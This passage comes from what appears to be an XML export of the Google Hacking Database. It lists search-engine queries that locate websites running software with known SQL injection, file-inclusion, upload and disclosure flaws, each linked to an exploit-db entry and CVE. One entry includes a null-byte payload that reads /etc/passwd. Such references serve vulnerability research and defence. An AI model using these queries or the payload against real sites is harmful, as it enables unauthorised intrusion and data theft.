<textualDescription>mail2forum phpBB Mod 1.2 (m2f_root_path) Remote Include Vulns - CVE: 2006-3735: https://www.exploit-db.com/exploits/2019</textualDescription>
<query>allinurl:/m2f_usercp.php?</query>
<querystring>https://www.google.com/search?q=allinurl:/m2f_usercp.php%3F</querystring>
<edb>https://www.exploit-db.com/exploits/2019</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2906</id>
<link>https://www.exploit-db.com/ghdb/2906</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:/modernbill/</shortDescription>
<textualDescription>Modernbill 1.6 (config.php) Remote File Include Vulnerability - CVE: 2006-4034: https://www.exploit-db.com/exploits/2127</textualDescription>
<query>allinurl:/modernbill/</query>
<querystring>https://www.google.com/search?q=allinurl%3A%2Fmodernbill%2F</querystring>
<edb>https://www.exploit-db.com/exploits/2127</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2023</id>
<link>https://www.exploit-db.com/ghdb/2023</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:/myspeach/</shortDescription>
<textualDescription>MySpeach 3.0.2 (my_ms[root]) Remote File Include Vulnerability - CVE: 2006-4630: https://www.exploit-db.com/exploits/2301</textualDescription>
<query>allinurl:/myspeach/</query>
<querystring>https://www.google.com/search?q=allinurl:/myspeach/</querystring>
<edb>https://www.exploit-db.com/exploits/2301</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1936</id>
<link>https://www.exploit-db.com/ghdb/1936</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:/phpress/</shortDescription>
<textualDescription>phpress 0.2.0 (adisplay.php lang) Local File Inclusion Vulnerability: https://www.exploit-db.com/exploits/4382</textualDescription>
<query>allinurl:/phpress/</query>
<querystring>https://www.google.com/search?q=allinurl:/phpress/</querystring>
<edb>https://www.exploit-db.com/exploits/4382</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2834</id>
<link>https://www.exploit-db.com/ghdb/2834</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:buyer/index.php?ProductID=</shortDescription>
<textualDescription>Alibaba Clone Platinum (buyer/index.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12609</textualDescription>
<query>allinurl:buyer/index.php?ProductID=</query>
<querystring>https://www.google.com/search?q=allinurl%3Abuyer%2Findex.php%3FProductID%3D</querystring>
<edb>https://www.exploit-db.com/exploits/12609</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3195</id>
<link>https://www.exploit-db.com/ghdb/3195</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:casting_view.php?adnum=</shortDescription>
<textualDescription>Modelbook (casting_view.php) SQL Injection Vulnerability - CVE: 2010-1705: https://www.exploit-db.com/exploits/12443</textualDescription>
<query>allinurl:casting_view.php?adnum=</query>
<querystring>https://www.google.com/search?q=allinurl:casting_view.php%3Fadnum%3D</querystring>
<edb>https://www.exploit-db.com/exploits/12443</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3181</id>
<link>https://www.exploit-db.com/ghdb/3181</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:clientsignup.php &quot;classifieds&quot;</shortDescription>
<textualDescription>Living Local 1.1 (XSS-RFU) Multiple Remote Vulnerabilities - CVE: 2008-6530: https://www.exploit-db.com/exploits/7408</textualDescription>
<query>allinurl:clientsignup.php &quot;classifieds&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:clientsignup.php+%22classifieds%22</querystring>
<edb>https://www.exploit-db.com/exploits/7408</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1750</id>
<link>https://www.exploit-db.com/ghdb/1750</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:com_comprofiler</shortDescription>
<textualDescription>Joomla Community Builder 1.0.1 Blind SQL Injection Vulnerability - CVE: 2008-2093: https://www.exploit-db.com/exploits/5491</textualDescription>
<query>allinurl:com_comprofiler</query>
<querystring>https://www.google.com/search?q=allinurl:com_comprofiler</querystring>
<edb>https://www.exploit-db.com/exploits/5491</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2608</id>
<link>https://www.exploit-db.com/ghdb/2608</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:com_jpad</shortDescription>
<textualDescription>Joomla Component JPad 1.0 SQL Injection Vulnerability (postauth) - CVE: 2008-4715: https://www.exploit-db.com/exploits/5493</textualDescription>
<query>allinurl:com_jpad</query>
<querystring>https://www.google.com/search?q=allinurl:com_jpad</querystring>
<edb>https://www.exploit-db.com/exploits/5493</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1441</id>
<link>https://www.exploit-db.com/ghdb/1441</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:com_pccookbook</shortDescription>
<textualDescription>Joomla Component com_pccookbook (user_id) SQL Injection Vulnerability - CVE: 2008-0844: https://www.exploit-db.com/exploits/5145</textualDescription>
<query>allinurl:com_pccookbook</query>
<querystring>https://www.google.com/search?q=allinurl:com_pccookbook</querystring>
<edb>https://www.exploit-db.com/exploits/5145</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1720</id>
<link>https://www.exploit-db.com/ghdb/1720</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:com_pccookbook</shortDescription>
<textualDescription>pc_cookbook Mambo Component 0.3 Include Vulnerability - CVE: 2006-3530: https://www.exploit-db.com/exploits/2024</textualDescription>
<query>allinurl:com_pccookbook</query>
<querystring>https://www.google.com/search?q=allinurl:com_pccookbook</querystring>
<edb>https://www.exploit-db.com/exploits/2024</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2206</id>
<link>https://www.exploit-db.com/ghdb/2206</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:directory.php?ax=list</shortDescription>
<textualDescription>Prozilla Directory Script (directory.php cat_id) SQL Injection Vulnerbility - CVE: 2007-3809: https://www.exploit-db.com/exploits/4185</textualDescription>
<query>allinurl:directory.php?ax=list</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=allinurl:directory.php%3Fax%3Dlist</querystring>
<edb>https://www.exploit-db.com/exploits/4185</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2487</id>
<link>https://www.exploit-db.com/ghdb/2487</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:flashblog.html &quot;flashblog&quot;</shortDescription>
<textualDescription>FlashBlog (articulo_id) Remote SQL Injection Vulnerability - CVE: 2008-2572: https://www.exploit-db.com/exploits/5685</textualDescription>
<query>allinurl:flashblog.html &quot;flashblog&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:flashblog.html+%22flashblog%22</querystring>
<edb>https://www.exploit-db.com/exploits/5685</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3228</id>
<link>https://www.exploit-db.com/ghdb/3228</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:forum_answer.php?que_id=</shortDescription>
<textualDescription>AskMe Pro 2.1 (que_id) SQL Injection Vulnerability - CVE: 2007-4085: https://www.exploit-db.com/exploits/12372</textualDescription>
<query>allinurl:forum_answer.php?que_id=</query>
<querystring>https://www.google.com/search?q=allinurl:forum_answer.php%3Fque_id%3D</querystring>
<edb>https://www.exploit-db.com/exploits/12372</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3192</id>
<link>https://www.exploit-db.com/ghdb/3192</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:fullview.php?tempid=</shortDescription>
<textualDescription>Template Seller Pro 3.25 (tempid) Remote SQL Injection: https://www.exploit-db.com/exploits/12360</textualDescription>
<query>allinurl:fullview.php?tempid=</query>
<querystring>https://www.google.com/search?q=allinurl:fullview.php%3Ftempid%3D</querystring>
<edb>https://www.exploit-db.com/exploits/12360</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1814</id>
<link>https://www.exploit-db.com/ghdb/1814</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:index.php?act=publ</shortDescription>
<textualDescription>Qwerty CMS (id) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/8104</textualDescription>
<query>allinurl:index.php?act=publ</query>
<querystring>https://www.google.com/search?q=allinurl:index.php%3Fact%3Dpubl</querystring>
<edb>https://www.exploit-db.com/exploits/8104</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3655</id>
<link>https://www.exploit-db.com/ghdb/3655</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:index.php?db=information_schema</shortDescription>
<textualDescription>Submitter: modpr0be phpMyAdmin Direct Access to information_schema Database</textualDescription>
<query>allinurl:index.php?db=information_schema</query>
<querystring>https://www.google.com/search?q=allinurl:index.php?db=information_schema</querystring>
<edb></edb>
<date>2010-12-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>3036</id>
<link>https://www.exploit-db.com/ghdb/3036</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:links.php?t=search</shortDescription>
<textualDescription>phpBB Links MOD 1.2.2 Remote SQL Injection - CVE: 2007-4653: https://www.exploit-db.com/exploits/4346</textualDescription>
<query>allinurl:links.php?t=search</query>
<querystring>https://www.google.com/search?q=allinurl:links.php%3Ft%3Dsearch</querystring>
<edb>https://www.exploit-db.com/exploits/4346</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3168</id>
<link>https://www.exploit-db.com/ghdb/3168</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:offers.php?id=</shortDescription>
<textualDescription>B2B Classic Trading Script (offers.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12532</textualDescription>
<query>allinurl:offers.php?id=</query>
<querystring>https://www.google.com/search?q=allinurl:offers.php%3Fid%3D</querystring>
<edb>https://www.exploit-db.com/exploits/12532</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3205</id>
<link>https://www.exploit-db.com/ghdb/3205</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:offers_buy.php?id=</shortDescription>
<textualDescription>EC21 Clone 3.0 (id) SQL Injection Vulnerability - CVE: 2010-1726: https://www.exploit-db.com/exploits/12459</textualDescription>
<query>allinurl:offers_buy.php?id=</query>
<querystring>https://www.google.com/search?q=allinurl:offers_buy.php%3Fid%3D</querystring>
<edb>https://www.exploit-db.com/exploits/12459</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3220</id>
<link>https://www.exploit-db.com/ghdb/3220</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:offers_buy.php?id=</shortDescription>
<textualDescription>Alibaba Clone Platinum (offers_buy.php) SQL Injection Vulnerability - CVE: 2010-1725: https://www.exploit-db.com/exploits/12468</textualDescription>
<query>allinurl:offers_buy.php?id=</query>
<querystring>https://www.google.com/search?q=allinurl:offers_buy.php%3Fid%3D</querystring>
<edb>https://www.exploit-db.com/exploits/12468</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2613</id>
<link>https://www.exploit-db.com/ghdb/2613</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:option=com_livechat</shortDescription>
<textualDescription>Joomla Live Chat (SQL/Proxy) Multiple Remote Vulnerabilities - CVE: 2008-6883: https://www.exploit-db.com/exploits/7441</textualDescription>
<query>allinurl:option=com_livechat</query>
<querystring>https://www.google.com/search?q=allinurl:option%3Dcom_livechat</querystring>
<edb>https://www.exploit-db.com/exploits/7441</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3328</id>
<link>https://www.exploit-db.com/ghdb/3328</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:option=com_rsmonials</shortDescription>
<textualDescription>Joomla Component rsmonials Remote Cross Site Scripting: https://www.exploit-db.com/exploits/8517</textualDescription>
<query>allinurl:option=com_rsmonials</query>
<querystring>https://www.google.com/search?q=allinurl:option%3Dcom_rsmonials</querystring>
<edb>https://www.exploit-db.com/exploits/8517</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2448</id>
<link>https://www.exploit-db.com/ghdb/2448</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:readmore.php?news_id</shortDescription>
<textualDescription>PHP-Fusion v4.01 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12635</textualDescription>
<query>allinurl:readmore.php?news_id</query>
<querystring>https://www.google.com/search?q=allinurl:readmore.php%3Fnews_id</querystring>
<edb>https://www.exploit-db.com/exploits/12635</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3250</id>
<link>https://www.exploit-db.com/ghdb/3250</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:show_memorial.php?id=</shortDescription>
<textualDescription>Memorial Web Site Script (id) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12351</textualDescription>
<query>allinurl:show_memorial.php?id=</query>
<querystring>https://www.google.com/search?q=allinurl:show_memorial.php%3Fid%3D</querystring>
<edb>https://www.exploit-db.com/exploits/12351</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2931</id>
<link>https://www.exploit-db.com/ghdb/2931</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:spaw2/dialogs/</shortDescription>
<textualDescription>Spaw Editor v1.0 &amp; 2.0 Remote File Upload: https://www.exploit-db.com/exploits/12672</textualDescription>
<query>allinurl:spaw2/dialogs/</query>
<querystring>https://www.google.com/search?q=allinurl%3Aspaw2%2Fdialogs%2F</querystring>
<edb>https://www.exploit-db.com/exploits/12672</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1377</id>
<link>https://www.exploit-db.com/ghdb/1377</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:tseekdir.cgi</shortDescription>
<textualDescription>tseekdir.cgi?location=FILENAME%00eg:tseekdir.cgi?location=/etc/passwd%00basically any file on the server can be viewed by inserting a null (%00) into the URL.credit to duritohttp://seclists.org/bugtraq/2006/May/0184.html</textualDescription>
<query>allinurl:tseekdir.cgi</query>
<querystring>https://www.google.com/search?q=allinurl%3Atseekdir.cgi</querystring>
<edb></edb>
<date>2006-05-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>4049</id>
<link>https://www.exploit-db.com/ghdb/4049</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl:wp-content/plugins/wptf-image-gallery/</shortDescription>
<textualDescription>Description:- Aribtrary File Download Vuln.
Exploit :- www.exploit-db.com/exploits/37751/
Google :- allinurl:wp-content/plugins/wptf-image-gallery/
Sincerely,
Zeel Chavda</textualDescription>
<query>allinurl:wp-content/plugins/wptf-image-gallery/</query>
<querystring>https://www.google.com/search?q=allinurl:wp-content/plugins/wptf-image-gallery/</querystring>
<edb>https://www.exploit-db.com/exploits/37751</edb>
<date>2015-08-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>1877</id>
<link>https://www.exploit-db.com/ghdb/1877</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>AlstraSoft Web &quot;ESE&quot;</shortDescription>
<textualDescription>AlstraSoft Web Email Script Enterprise (id) SQL Injection Vuln - CVE: 2008-5751: https://www.exploit-db.com/exploits/7596</textualDescription>
<query>AlstraSoft Web &quot;ESE&quot;</query>
<querystring>https://www.google.com/search?q=AlstraSoft+Web+%22ESE%22</querystring>
<edb>https://www.exploit-db.com/exploits/7596</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1552</id>
<link>https://www.exploit-db.com/ghdb/1552</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>anyInventory, the most flexible and powerful web-based inventory system</shortDescription>
<textualDescription>AnyInventory 2.0 (environment.php) Remote File Inclusion Vuln - CVE: 2007-4744: https://www.exploit-db.com/exploits/4365</textualDescription>
<query>anyInventory, the most flexible and powerful web-based inventory system</query>
<querystring>https://www.google.com/search?q=anyInventory,+the+most+flexible+and+powerful+web-based+inventory+system</querystring>
<edb>https://www.exploit-db.com/exploits/4365</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2485</id>
<link>https://www.exploit-db.com/ghdb/2485</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>APBoard 2.1.0 © 2003-2010 APP - Another PHP Program</shortDescription>
<textualDescription>APBoard v2.1.0 ( board.php?id=) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14559</textualDescription>
<query>APBoard 2.1.0 © 2003-2010 APP - Another PHP Program</query>
<querystring>https://www.google.com/search?q=APBoard+2.1.0+%C2%A9+2003-2010+APP+-+Another+PHP+Program</querystring>
<edb>https://www.exploit-db.com/exploits/14559</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3402</id>
<link>https://www.exploit-db.com/ghdb/3402</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>aspWebLinks 2.0</shortDescription>
<textualDescription>aspWebLinks 2.0 Remote SQL Injection / Admin Pass Change - CVE: 2006-2848: https://www.exploit-db.com/exploits/1859</textualDescription>
<query>aspWebLinks 2.0</query>
<querystring>https://www.google.com/search?q=aspWebLinks+2.0</querystring>
<edb>https://www.exploit-db.com/exploits/1859</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2981</id>
<link>https://www.exploit-db.com/ghdb/2981</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Ayemsis Emlak Pro</shortDescription>
<textualDescription>Ayemsis Emlak Pro (acc.mdb) Database Disclosure Vulnerability: https://www.exploit-db.com/exploits/7665</textualDescription>
<query>Ayemsis Emlak Pro</query>
<querystring>https://www.google.com/search?q=Ayemsis+Emlak+Pro</querystring>
<edb>https://www.exploit-db.com/exploits/7665</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1911</id>
<link>https://www.exploit-db.com/ghdb/1911</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>© 2005-2006 Powered by eSyndiCat Directory Software</shortDescription>
<textualDescription>eSyndiCat Directory Software Multiple SQL Injection Vulnerabilities - CVE: 2007-3811: https://www.exploit-db.com/exploits/4183</textualDescription>
<query>© 2005-2006 Powered by eSyndiCat Directory Software</query>
<querystring>https://www.google.com/search?q=%C3%82%C2%A9+2005-2006+Powered+by+eSyndiCat+Directory+Software</querystring>
<edb>https://www.exploit-db.com/exploits/4183</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2210</id>
<link>https://www.exploit-db.com/ghdb/2210</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>© 2007 by Lama Software - Accomm Solutions GmbH &amp; Co. KG</shortDescription>
<textualDescription>Lama Software (14.12.2007) Multiple Remote File Inclusion Vulnerabilities - CVE: 2008-0423: https://www.exploit-db.com/exploits/4955</textualDescription>
<query>© 2007 by Lama Software - Accomm Solutions GmbH &amp; Co. KG</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=%C3%82%C2%A9+2007+by+Lama+Software+-+Accomm+Solutions+GmbH+%26+Co.+KG</querystring>
<edb>https://www.exploit-db.com/exploits/4955</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1644</id>
<link>https://www.exploit-db.com/ghdb/1644</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>©2005 Ocean12 Technologies. All rights reserved</shortDescription>
<textualDescription>Ocean12 Membership Manager Pro Database Disclosure Vulnerability: https://www.exploit-db.com/exploits/7245</textualDescription>
<query>©2005 Ocean12 Technologies. All rights reserved</query>
<querystring>https://www.google.com/search?q=%C3%82%C2%A92005+Ocean12+Technologies.+All+rights+reserved</querystring>
<edb>https://www.exploit-db.com/exploits/7245</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2170</id>
<link>https://www.exploit-db.com/ghdb/2170</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>browse_videos.php?</shortDescription>
<textualDescription>phpVID 0.9.9 (categories_type.php cat) SQL Injection Vulnerability - CVE: 2007-3610: https://www.exploit-db.com/exploits/4153</textualDescription>
<query>browse_videos.php?</query>
<querystring>https://www.google.com/search?q=browse_videos.php%3F</querystring>
<edb>https://www.exploit-db.com/exploits/4153</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2177</id>
<link>https://www.exploit-db.com/ghdb/2177</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>buyers_subcategories.php?IndustryID=</shortDescription>
<textualDescription>Softbiz B2B trading Marketplace Script buyers_subcategories SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12245</textualDescription>
<query>buyers_subcategories.php?IndustryID=</query>
<querystring>https://www.google.com/search?q=buyers_subcategories.php%3FIndustryID%3D</querystring>
<edb>https://www.exploit-db.com/exploits/12245</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2362</id>
<link>https://www.exploit-db.com/ghdb/2362</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>calendar.asp?eventdetail</shortDescription>
<textualDescription>AspWebCalendar 2008 Remote File Upload Vulnerability - CVE: 2008-2832: https://www.exploit-db.com/exploits/5850</textualDescription>
<query>calendar.asp?eventdetail</query>
<querystring>https://www.google.com/search?q=calendar.asp%3Feventdetail</querystring>
<edb>https://www.exploit-db.com/exploits/5850</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2693</id>
<link>https://www.exploit-db.com/ghdb/2693</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>CaLogic Calendars V1.2.2</shortDescription>
<textualDescription>CaLogic Calendars 1.2.2 (CLPath) Remote File Include Vulnerabilities - CVE: 2006-2570: https://www.exploit-db.com/exploits/1809</textualDescription>
<query>CaLogic Calendars V1.2.2</query>
<querystring>https://www.google.com/search?q=CaLogic+Calendars+V1.2.2</querystring>
<edb>https://www.exploit-db.com/exploits/1809</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2426</id>
<link>https://www.exploit-db.com/ghdb/2426</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>cat_sell.php?cid= or selloffers.php?cid=</shortDescription>
<textualDescription>B2B Trading Marketplace SQL Injection Vulnerability - CVE: 2005-3937: https://www.exploit-db.com/exploits/10656</textualDescription>
<query>cat_sell.php?cid= or selloffers.php?cid=</query>
<querystring>https://www.google.com/search?q=cat_sell.php%3Fcid%3D++or++selloffers.php%3Fcid%3D</querystring>
<edb>https://www.exploit-db.com/exploits/10656</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2461</id>
<link>https://www.exploit-db.com/ghdb/2461</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>ClearBudget v0.6.1</shortDescription>
<textualDescription>ClearBudget 0.6.1 Insecure Cookie Handling / LFI Vulnerabilities: https://www.exploit-db.com/exploits/7992</textualDescription>
<query>ClearBudget v0.6.1</query>
<querystring>https://www.google.com/search?q=ClearBudget+v0.6.1</querystring>
<edb>https://www.exploit-db.com/exploits/7992</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1989</id>
<link>https://www.exploit-db.com/ghdb/1989</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Coded By WebLOADER</shortDescription>
<textualDescription>Webloader v7 - v8 ( vid ) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12647</textualDescription>
<query>Coded By WebLOADER</query>
<querystring>https://www.google.com/search?q=Coded+By+WebLOADER</querystring>
<edb>https://www.exploit-db.com/exploits/12647</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2996</id>
<link>https://www.exploit-db.com/ghdb/2996</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Come from home Script ( Latest Project ) www.esmart-vision.com</shortDescription>
<textualDescription>Smart Vsion Script News (newsdetail) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10977</textualDescription>
<query>Come from home Script ( Latest Project ) www.esmart-vision.com</query>
<querystring>https://www.google.com/search?q=Come+from+home+Script+(+Latest+Project+)+www.esmart-vision.com</querystring>
<edb>https://www.exploit-db.com/exploits/10977</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2489</id>
<link>https://www.exploit-db.com/ghdb/2489</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>com_easybook</shortDescription>
<textualDescription>Joomla Component EasyBook 1.1 (gbid) SQL Injection - CVE: 2008-2569: https://www.exploit-db.com/exploits/5740</textualDescription>
<query>com_easybook</query>
<querystring>https://www.google.com/search?q=com_easybook</querystring>
<edb>https://www.exploit-db.com/exploits/5740</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2976</id>
<link>https://www.exploit-db.com/ghdb/2976</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>com_ijoomla_rss</shortDescription>
<textualDescription>Joomla Component com_ijoomla_rss Blind SQL Injection - CVE: 2009-2099: https://www.exploit-db.com/exploits/8959</textualDescription>
<query>com_ijoomla_rss</query>
<querystring>https://www.google.com/search?q=com_ijoomla_rss</querystring>
<edb>https://www.exploit-db.com/exploits/8959</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2632</id>
<link>https://www.exploit-db.com/ghdb/2632</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>com_thyme</shortDescription>
<textualDescription>Joomla Component Thyme 1.0 (event) SQL Injection Vulnerability - CVE: 2008-6116: https://www.exploit-db.com/exploits/7182</textualDescription>
<query>com_thyme</query>
<querystring>https://www.google.com/search?q=com_thyme</querystring>
<edb>https://www.exploit-db.com/exploits/7182</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1614</id>
<link>https://www.exploit-db.com/ghdb/1614</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>contact_frm.php</shortDescription>
<textualDescription>Recipes Website 1.0 SQL Injection - OSVDB-ID: 64841: https://www.exploit-db.com/exploits/12703</textualDescription>
<query>contact_frm.php</query>
<querystring>https://www.google.com/search?q=contact_frm.php</querystring>
<edb>https://www.exploit-db.com/exploits/12703</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1483</id>
<link>https://www.exploit-db.com/ghdb/1483</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>content_by_cat.asp?contentid ''catid''</shortDescription>
<textualDescription>ASPapp Knowledge Base Remote SQL Injection Vulnerability - CVE: 2008-1430: https://www.exploit-db.com/exploits/5286</textualDescription>
<query>content_by_cat.asp?contentid ''catid''</query>
<querystring>https://www.google.com/search?q=content_by_cat.asp%3Fcontentid+''catid''</querystring>
<edb>https://www.exploit-db.com/exploits/5286</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2168</id>
<link>https://www.exploit-db.com/ghdb/2168</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>content_by_cat.asp?contentid ''catid''</shortDescription>
<textualDescription>ASPapp KnowledgeBase (catid) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/6590</textualDescription>
<query>content_by_cat.asp?contentid ''catid''</query>
<querystring>https://www.google.com/search?q=content_by_cat.asp%3Fcontentid+''catid''</querystring>
<edb>https://www.exploit-db.com/exploits/6590</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3496</id>
<link>https://www.exploit-db.com/ghdb/3496</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Copyright . Nucleus CMS v3.22 . Valid XHTML 1.0 Strict . Valid CSS . Back to top</shortDescription>
<textualDescription>Nucleus CMS 3.22 (DIR_LIBS) Arbitrary Remote Inclusion - CVE: 2006-2583: https://www.exploit-db.com/exploits/1816</textualDescription>
<query>Copyright . Nucleus CMS v3.22 . Valid XHTML 1.0 Strict . Valid CSS . Back to top</query>
<querystring>https://www.google.com/search?q=Copyright+.+Nucleus+CMS+v3.22+.+Valid+XHTML+1.0+Strict+.+Valid+CSS+.+Back+to+top</querystring>
<edb>https://www.exploit-db.com/exploits/1816</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1379</id>
<link>https://www.exploit-db.com/ghdb/1379</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Copyright . Nucleus CMS v3.22 . Valid XHTML 1.0 Strict . Valid CSS . Back to top -demo -&quot;deadly eyes&quot;</shortDescription>
<textualDescription>this is for Nucleus 3.22 CMS arbitrary remote inclusion advisory/poc exploit: http://retrogod.altervista.org/nucleus_322_incl_xpl.html</textualDescription>
<query>Copyright . Nucleus CMS v3.22 . Valid XHTML 1.0 Strict . Valid CSS . Back to top -demo -&quot;deadly eyes&quot;</query>
<querystring>https://www.google.com/search?q=Copyright+.+Nucleus+CMS+v3.22+.+Valid+XHTML+1.0+Strict+.+Valid+CSS+.+Back+to+top+-demo+-%22deadly+eyes%22&amp;num=100&amp;filter=1</querystring>
<edb></edb>
<date>2006-05-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>3294</id>
<link>https://www.exploit-db.com/ghdb/3294</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Copyright 1999-2010 Rocksalt International Pty Ltd. All rights reserved</shortDescription>
